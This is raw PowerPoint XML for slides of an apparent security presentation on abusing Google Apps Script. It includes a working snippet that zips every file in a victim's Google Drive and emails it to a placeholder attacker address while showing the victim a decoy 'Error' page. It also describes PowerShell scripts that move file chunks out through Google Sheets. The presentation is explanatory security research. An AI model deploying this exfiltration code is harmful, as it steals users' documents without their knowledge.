            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>file.getSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>file.getUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>    ]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>sheet.appendRow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(data);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>doGet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>HtmlService.createHtmlOutputFromFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>("index.html")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>    .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>setTitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BCEB68F-87F0-DB69-B824-C4D8B02948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122" y="1152419"/>
            <a:ext cx="5484909" cy="2126562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B482877-0F91-F278-014F-2BBB1C883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129" y="3464236"/>
            <a:ext cx="2970530" cy="1276985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBEFFD81-B285-5D20-AD66-6F974A473133}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2200275" y="4262589"/>
            <a:ext cx="2293143" cy="3357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E484B689-9A20-9ED7-1F17-5CB2AA69738B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>31/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3272561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Scenario #4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Sous-titre 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC270F5D-E53C-182B-1F0B-8E9773948A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311710" y="1272521"/>
            <a:ext cx="8375089" cy="1174261"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>The victim accesses a malicious GAS application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>All the documents in the Google Drive space are exfiltrated to the attacker’s mailbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>It is possible to compress documents in zip via Google Apps Script in order to send the documents in a single operation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{409AAED1-47EF-7C6D-3170-FE77BB7D9B71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1037487" y="2877056"/>
            <a:ext cx="2203111" cy="1902526"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Connecteur droit avec flèche 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0701734F-D929-9C0C-E0C0-D2BFD9BCA536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3828893" y="4085312"/>
            <a:ext cx="2783032"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58A23A2B-349E-2E88-E80D-6D9146E95995}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3749196" y="3795560"/>
            <a:ext cx="3703846" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> documents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>by using the victim's mailbox</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{281B0C18-C839-843E-0707-B54C272EDC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639370" y="2703578"/>
            <a:ext cx="8047429" cy="2345957"/>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Gmail : désormais, les alias de messagerie vont apparaître dans la barre de  recherche">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD3A80CD-E01C-6759-9669-60ADB1D6215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3310"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6955731" y="3571896"/>
            <a:ext cx="1358202" cy="693547"/>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85E50119-6EEE-04D2-BE47-2F39AD266BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>32/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210105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Scenario #4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle : coins arrondis 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F069C08B-097D-BEC9-BE5D-BB22FD671DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5829300" y="959412"/>
            <a:ext cx="3210401" cy="3923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1400" b="1" dirty="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>snippet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>DriveDocToMail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(){ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>listOfFiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>DriveApp.getFiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var blobs = [];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>listOfFiles.hasNext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>()){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>    var file = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>listOfFiles.next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>blobs.push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>file.getBlob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>());   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var zip = Utilities.zip(blobs, 'newFiles.zip');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>fileszip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>DriveApp.createFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(zip);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>MailApp.sendEmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>xxx@xxx.xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>Exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>", "Data", {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>attachments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>:[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>fileszip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>]});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>doGet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>HtmlService.createHtmlOutputFromFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>("index.html")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>    .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>setTitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Sous-titre 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAD8E077-0153-5140-D899-FF59DAAD14A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311711" y="1272521"/>
            <a:ext cx="5388050" cy="3398539"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Limitation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1450" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>50MB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1450" dirty="0" err="1">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>attachment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1450" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> size limitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1450" dirty="0" err="1">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1450" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1450" dirty="0" err="1">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>applied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1450" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> by GAS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1450" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{300FBA8F-34C5-94DE-37F6-88AEDA168095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>33/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3322977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Scenario #5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Sous-titre 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC270F5D-E53C-182B-1F0B-8E9773948A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311710" y="1272521"/>
            <a:ext cx="8832290" cy="1174261"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>This scenario differs from the previous ones because it is initiated from the victim's machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Exfiltration.ps1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>to list files, encode, create and send the chunks to a Google Sheets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Reveal.ps1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>to reconstruct the files on the attacker's side</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
